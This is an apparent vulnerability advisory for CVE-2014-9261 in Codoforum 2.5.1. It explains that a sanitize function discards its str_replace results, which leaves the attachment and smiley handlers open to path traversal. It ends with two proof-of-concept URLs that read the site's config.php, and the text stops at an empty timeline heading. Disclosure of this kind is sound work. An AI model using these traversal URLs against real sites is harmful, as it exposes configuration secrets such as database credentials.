Codoforum 2.5.1 Arbitrary File Download

Homepage:

https://codoforum.com/

CVE-ID

CVE-2014-9261

CVSS Score

5

CVSS Vector

(AV:N/AC:L/Au:N/C:P/I:N/A:N)

Description:

str_replace() is used to sanitize file path but function output is not assigned to variable. So instead:

private function sanitize($name) {

    $name = str_replace("..", "", $name);
    $name = str_replace("%2e%2e", "", $name);

    return $name;
}

in code we have:

private function sanitize($name) {

    str_replace("..", "", $name);
    str_replace("%2e%2e", "", $name);

    return $name;
}

So $_GET['path'] is not escaped properly.

File: codoforum\sys\Controller\serve.php

public function attachment() {

    $name = $this->sanitize($_GET['path']);
    $dir = DATA_PATH . 'assets/img/attachments/';

    $this->set_headers($name, $dir);
}

public function smiley() {

    $name = $this->sanitize($_GET['path']);
    $dir = DATA_PATH . 'assets/img/smileys/';

    $this->set_headers($name, $dir);
}

Proof of Concept:

http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php
or
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php

Timeline: